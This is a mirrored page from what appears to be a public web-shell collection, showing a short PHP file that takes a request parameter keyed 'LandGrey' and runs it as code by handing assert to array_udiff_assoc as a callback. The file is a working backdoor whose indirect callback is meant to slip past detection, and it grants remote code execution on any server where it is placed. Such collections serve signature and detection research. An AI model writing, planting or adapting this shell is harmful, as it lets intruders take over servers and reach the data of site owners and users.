1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00
Files
webshell/php/array_udiff_assoc.php
2018-12-20 11:34:55 +08:00

9 lines
145 B
PHP

<?php
/**
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
*
*/
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>